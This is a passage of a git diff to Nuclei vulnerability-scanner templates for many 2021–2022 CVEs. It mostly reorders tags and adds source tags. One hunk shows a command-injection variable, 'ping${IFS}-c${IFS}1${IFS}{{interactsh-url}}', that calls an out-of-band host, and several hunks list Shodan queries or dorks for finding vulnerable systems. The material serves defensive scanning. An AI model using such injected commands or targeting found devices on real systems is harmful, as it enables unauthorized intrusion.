a/config/nuclei-templates/cves/2021/CVE-2021-39350.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-39350.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-39350 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated + tags: wpscan,cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-40856.yaml b/config/nuclei-templates/cves/2021/CVE-2021-40856.yaml index 3499f2bcd..f129476ce 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-40856.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-40856.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40856 cwe-id: CWE-287 - tags: cve,cve2021,comfortel,auth-bypass,auerswald + tags: packetstorm,cve,cve2021,comfortel,auth-bypass,auerswald requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-40868.yaml b/config/nuclei-templates/cves/2021/CVE-2021-40868.yaml index 38c1061e7..91109ab58 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-40868.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-40868.yaml @@ -16,7 +16,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40868 cwe-id: CWE-79 - tags: cve,cve2021,xss,cloudron + tags: cve,cve2021,xss,cloudron,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-41192.yaml b/config/nuclei-templates/cves/2021/CVE-2021-41192.yaml index dba2a044b..b06e4b427 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-41192.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-41192.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-1188 metadata: shodan-query: http.favicon.hash:698624197 - tags: cve,cve2021,redash,auth-bypass + tags: hackerone,cve,cve2021,redash,auth-bypass requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-41691.yaml b/config/nuclei-templates/cves/2021/CVE-2021-41691.yaml index 76f247c4d..327096982 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-41691.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-41691.yaml @@ -11,7 +11,7 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 classification: cve-id: CVE-2021-41691 - tags: cve,cve2021,opensis,sqli,auth + tags: sqli,auth,edb,cve,cve2021,opensis variables: num: "999999999" diff --git a/config/nuclei-templates/cves/2021/CVE-2021-41773.yaml b/config/nuclei-templates/cves/2021/CVE-2021-41773.yaml index 744f6535a..2786956c2 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-41773.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-41773.yaml @@ -19,8 +19,8 @@ info: cve-id: CVE-2021-41773 cwe-id: CWE-22 metadata: - verified: true shodan-query: apache version:2.4.49 + verified: "true" tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev variables: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-41826.yaml b/config/nuclei-templates/cves/2021/CVE-2021-41826.yaml index 4ab7d9706..8003b0a16 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-41826.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-41826.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-41826 cwe-id: CWE-601 - tags: cve,cve2021,placeos,redirect + tags: cve2021,placeos,redirect,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-42013.yaml b/config/nuclei-templates/cves/2021/CVE-2021-42013.yaml index 0d0e7889c..d91a1e256 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-42013.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-42013.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-42013 cwe-id: CWE-22 metadata: - verified: true + verified: "true" tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev variables: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-42063.yaml b/config/nuclei-templates/cves/2021/CVE-2021-42063.yaml index 331cc7e71..f56a29158 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-42063.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-42063.yaml @@ -19,7 +19,7 @@ info: metadata: shodan-query: http.favicon.hash:-266008933 zoomeye-query: +app:"SAP NetWeaver Application Server httpd - tags: cve,cve2021,sap,xss + tags: cve2021,sap,xss,seclists,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-42071.yaml b/config/nuclei-templates/cves/2021/CVE-2021-42071.yaml index 00c590c1e..1aa5e4788 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-42071.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-42071.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42071 cwe-id: CWE-78 - tags: cve,cve2021,visualtools,rce,oast,injection + tags: edb,cve,cve2021,visualtools,rce,oast,injection requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-42192.yaml b/config/nuclei-templates/cves/2021/CVE-2021-42192.yaml index 40407f1f1..486db32a1 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-42192.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-42192.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.8 cve-id: CVE-2021-42192 cwe-id: CWE-269 - tags: cve,cve2021,konga,authenticated + tags: authenticated,edb,cve,cve2021,konga requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-43062.yaml b/config/nuclei-templates/cves/2021/CVE-2021-43062.yaml index 03e6b3cd1..3336b0445 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-43062.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-43062.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43062 cwe-id: CWE-79 - tags: cve,cve2021,fortimail,xss,fortinet + tags: cve,cve2021,fortimail,xss,fortinet,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-44077.yaml b/config/nuclei-templates/cves/2021/CVE-2021-44077.yaml index e9cd2d65f..e5f78a77e 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-44077.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-44077.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44077 cwe-id: CWE-287 - tags: cve,cve2021,zoho,manageengine,rce,kev + tags: rce,kev,msf,cve,cve2021,zoho,manageengine requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-44152.yaml b/config/nuclei-templates/cves/2021/CVE-2021-44152.yaml index 65f8cd654..3195545f0 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-44152.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-44152.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44152 cwe-id: CWE-287 - tags: unauth,rlm + tags: unauth,rlm,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-44528.yaml b/config/nuclei-templates/cves/2021/CVE-2021-44528.yaml index f2bb4ca0e..eb07ead21 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-44528.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-44528.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-44528 cwe-id: CWE-601 - tags: cve,cve2021,redirect + tags: seclists,cve,cve2021,redirect requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-44848.yaml b/config/nuclei-templates/cves/2021/CVE-2021-44848.yaml index 44e18bfcb..b174863f6 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-44848.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-44848.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.3 cve-id: CVE-2021-44848 cwe-id: CWE-287 - tags: cve,cve2021,exposure,thinfinity,virtualui + tags: virtualui,tenable,cve,cve2021,exposure,thinfinity requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-45043.yaml b/config/nuclei-templates/cves/2021/CVE-2021-45043.yaml index 407b0f617..a159da17f 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-45043.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-45043.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-22 metadata: google-dork: intitle:"HD-Network Real-time Monitoring System V2.0" - tags: cve,cve2021,hdnetwork,lfi,iot,camera + tags: camera,edb,cve,cve2021,hdnetwork,lfi,iot requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-45092.yaml b/config/nuclei-templates/cves/2021/CVE-2021-45092.yaml index 66949d342..9b4dd4f9f 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-45092.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-45092.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45092 cwe-id: CWE-74 - tags: cve,cve2021,injection,iframe,thinfinity + tags: iframe,thinfinity,tenable,cve,cve2021,injection requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-45422.yaml b/config/nuclei-templates/cves/2021/CVE-2021-45422.yaml index 6d5e2bce9..176844932 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-45422.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-45422.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.html:"Reprise License" verified: "true" - tags: cve,cve2021,reprise,xss + tags: cve,cve2021,reprise,xss,seclists requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-45428.yaml b/config/nuclei-templates/cves/2021/CVE-2021-45428.yaml index 78e093812..ec30ef8f6 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-45428.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-45428.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.html:"TLR-2005KSH" verified: "true" - tags: cve,cve2021,telesquare,intrusive,fileupload + tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-46005.yaml b/config/nuclei-templates/cves/2021/CVE-2021-46005.yaml index a278aab77..d8e3340bc 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-46005.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-46005.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.4 cve-id: CVE-2021-46005 cwe-id: CWE-79 - tags: cve,cve2021,xss,sourcecodester,authenticated + tags: sourcecodester,authenticated,edb,cve,cve2021,xss requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-46387.yaml b/config/nuclei-templates/cves/2021/CVE-2021-46387.yaml index 1b5473b83..da999dc5c 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-46387.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-46387.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: http.title:"Zywall2Plus" - tags: cve,cve2021,xss,zyxel + tags: cve,cve2021,xss,zyxel,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-46417.yaml b/config/nuclei-templates/cves/2021/CVE-2021-46417.yaml index a48ba7183..ce8b9dd70 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-46417.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-46417.yaml @@ -19,7 +19,7 @@ info: metadata: shodan-query: http.html:"Franklin Fueling Systems" verified: "true" - tags: cve,cve2021,franklinfueling,lfi + tags: packetstorm,cve,cve2021,franklinfueling,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-46422.yaml b/config/nuclei-templates/cves/2021/CVE-2021-46422.yaml index b021fd961..462fb8ba1 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-46422.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-46422.yaml @@ -19,7 +19,7 @@ info: metadata: shodan-query: html:"SDT-CW3B1" verified: "true" - tags: cve,cve2021,telesquare,rce,router,injection + tags: cve,cve2021,telesquare,rce,router,injection,edb variables: cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}" diff --git a/config/nuclei-templates/cves/2021/CVE-2021-46424.yaml b/config/nuclei-templates/cves/2021/CVE-2021-46424.yaml index 1ff5eb900..2b6d737b8 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-46424.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-46424.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.html:"TLR-2005KSH" verified: "true" - tags: cve,cve2021,telesquare,intrusive + tags: cve,cve2021,telesquare,intrusive,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0140.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0140.yaml index a9f19255d..48c298e85 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0140.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0140.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0140 cwe-id: CWE-200 - tags: cve,cve2022,xss,wordpress + tags: wpscan,cve,cve2022,xss,wordpress requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0148.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0148.yaml index b63413088..776c46aee 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0148.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0148.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0148 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated + tags: xss,wp-plugin,authenticated,wpscan,cve,cve2022,wordpress requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0149.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0149.yaml index b9dfd5e67..e3abf14b0 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0149.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0149.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0149 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated + tags: wpscan,cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0150.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0150.yaml index 9af094b9b..362d79172 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0150.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0150.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0150 cwe-id: CWE-79 - tags: cve,cve2022,xss,wordpress,wp-plugin,wp + tags: wordpress,wp-plugin,wp,wpscan,cve,cve2022,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0165.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0165.yaml index 9251bc6c3..9c67da252 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0165.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0165.yaml @@ -13,7 +13,7 @@ info: cvss-score: 8.80 cve-id: CVE-2022-0165 cwe-id: CWE-601 - tags: cve,cve2022,wp-plugin,redirect,wordpress,wp + tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0189.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0189.yaml index 037414416..c5572542f 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0189.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0189.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0189 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated + tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0201.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0201.yaml index b2db71dde..9aaf03e59 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0201.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0201.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0201 cwe-id: CWE-79 - tags: cve,cve2022,xss,wordpress,wp-plugin + tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0208.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0208.yaml index 4ede2bc76..2cb46066f 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0208.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0208.yaml @@ -13,7 +13,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc - tags: cve,cve2022,mappress,xss,wordpress,wp-plugin + tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0220.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0220.yaml index 3ab18215e..b3a8067ef 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0220.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0220.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0220 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,wp,xss + tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0271.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0271.yaml index 509d4c889..6fbeb1785 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0271.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0271.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0271 cwe-id: CWE-79 - tags: xss,wp,wp-plugin,wordpress,cve,cve2022,learnpress + tags: wp,wp-plugin,wordpress,cve,cve2022,learnpress,wpscan,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0281.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0281.yaml index e4526ab43..e0c898ff3 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0281.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0281.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-200 metadata: shodan-query: http.favicon.hash:780351152 - tags: cve,cve2022,microweber,disclosure + tags: cve,cve2022,microweber,disclosure,huntr requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0288.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0288.yaml index 848b9817c..b2ebd43bc 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0288.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0288.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.10 cve-id: CVE-2022-0288 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss + tags: wordpress,xss,wpscan,cve,cve2022 requests: - method: POST diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0346.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0346.yaml index 583105596..2d039d8e4 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0346.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0346.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: xss,wp,wordpress,wp-plugin,cve,cve2022 + tags: xss,wp,wordpress,wp-plugin,cve,cve2022,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0378.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0378.yaml index 71a10bd3d..06c037b53 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0378.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0378.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: http.favicon.hash:780351152 - tags: cve,cve2022,microweber,xss + tags: cve,cve2022,microweber,xss,huntr requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0422.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0422.yaml index 8aa38be3f..f17abb708 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0422.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0422.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0422 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin + tags: cve,cve2022,wordpress,xss,wp-plugin,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0432.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0432.yaml index c5ff378b9..ca1151f58 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0432.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0432.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0432 cwe-id: CWE-1321 - tags: cve,cve2022,mastodon,prototype + tags: mastodon,prototype,huntr,cve,cve2022 requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0437.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0437.yaml index 24dedd6f3..358ed67fa 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0437.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0437.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0437 cwe-id: CWE-79 - tags: cve,cve2022,karma,xss,oss + tags: oss,huntr,cve,cve2022,karma,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0482.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0482.yaml index 9e6755261..7ee41afa5 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0482.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0482.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.1 cve-id: CVE-2022-0482 cwe-id: CWE-863 - tags: cve,cve2022,easyappointments + tags: cve,cve2022,easyappointments,huntr requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0591.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0591.yaml index 6f32f5bea..0bfdd570a 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0591.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0591.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47 - https://nvd.nist.gov/vuln/detail/CVE-2022-0591 - tags: ssrf,wp,wp-plugin,wordpress,cve,cve2022,unauth,formcraft3 + tags: wp,wp-plugin,wordpress,cve,formcraft3,wpscan,ssrf,cve2022,unauth classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.10 diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0594.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0594.yaml index bc0a668a1..ae9bc5bec 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0594.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0594.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-863 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp,wp-plugin,exposure + tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan requests: - method: GET path: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0595.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0595.yaml index f11a0e314..a3282e603 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0595.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0595.yaml @@ -13,7 +13,7 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0595 cwe-id: CWE-79 - tags: cve,cve2022,xss,wordpress,wp-plugin + tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0599.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0599.yaml index fae220c49..811ed0421 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0599.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0599.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0599 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated + tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0656.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0656.yaml index 4ddb691a4..45ed58364 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0656.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0656.yaml @@ -16,7 +16,7 @@ info: metadata: google-dork: inurl:"/wp-content/plugins/udraw" verified: "true" - tags: cve,cve2022,wp,wordpress,lfi,udraw,wp-plugin,unauth + tags: wp,wordpress,wp-plugin,unauth,cve,cve2022,lfi,udraw,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0660.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0660.yaml index 1a43c8162..9cdc808f6 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0660.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0660.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-209 metadata: verified: "true" - tags: cve,cve2022,microweber,disclosure,authenticated + tags: cve2022,microweber,disclosure,authenticated,huntr,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0692.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0692.yaml index 15717f78c..d021cc25a 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0692.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0692.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0692 cwe-id: CWE-601 - tags: cve,cve2022,redirect,rudloff,alltube + tags: huntr,cve,cve2022,redirect,rudloff,alltube requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0776.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0776.yaml index 8f1d71e57..d7625fdd2 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0776.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0776.yaml @@ -11,7 +11,7 @@ info: - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ classification: cve-id: CVE-2022-0776 - tags: cve,cve2022,headless,postmessage,revealjs + tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs headless: - steps: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0870.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0870.yaml index 357023f4e..e97ed1ef8 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0870.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0870.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-918 metadata: shodan-query: http.favicon.hash:-449283196 - tags: cve,cve2022,ssrf,gogs + tags: cve,cve2022,ssrf,gogs,huntr requests: - method: GET diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0928.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0928.yaml index 1f5eb6cb5..20801cafe 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0928.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0928.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,xss,microweber,cms,authenticated + tags: authenticated,huntr,cve,cve2022,xss,microweber,cms requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0952.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0952.yaml index 24af88452..c51d27c11 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0952.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0952.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-862 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp,wp-plugin,sitemap + tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml index cd4e13baa..09542ab5a 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,xss,microweber + tags: cve,cve2022,xss,microweber,huntr requests: - raw: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0963.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0963.yaml index b09ad2e8c..e85a68073 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0963.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0963.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: 